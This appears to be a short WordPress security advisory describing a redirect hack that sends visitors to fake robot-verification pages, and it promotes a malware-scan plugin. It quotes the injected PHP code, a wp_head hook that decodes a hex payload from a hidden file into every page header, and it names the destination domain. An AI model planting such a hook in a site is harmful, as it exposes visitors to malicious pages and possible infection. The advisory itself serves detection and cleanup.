There has been a recent increase in cases of redirect hacks where WordPress sites are redirected to another site for robot verification without permission. Here are some examples of this malware embedding and how to deal with it.
Characteristics and Symptoms of Malware
With the code shown below, this malware embeds malicious JAVASCRIPT code in the header of a WordPress site and sends users who access the site to a fake page for robot verification.
This type of malware is called a redirect hack.
add_action('wp_head', 'get_hex_cache', 12);
function get_hex_cache()
{
return print(@hex2bin( 'number' . (file_get_contents(__DIR__ .' /_inc.tmp'))));
}
This code is a process that interrupts the WordPress header output and reads the malicious code body called inc.tmp to embed malware in the header of every page on the site.
The malicious code often sends the user to a domain named guesswhatnews.com, making the site’s content unreadable, so the user cannot view the content and may accidentally install a virus on the destination malicious page. There is a possibility that the user may not be able to view the content.
Detecting and Removing Malware
This malware is not easy to detect because it embeds malicious code everywhere in themes, plugins, and core files on your site.
Free WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].
If you have any malware or viruses on your computer, you can detect and remove them by using the “WordPress:Malware Scanning & Security Plug-in”.
We hope you will give it a try.
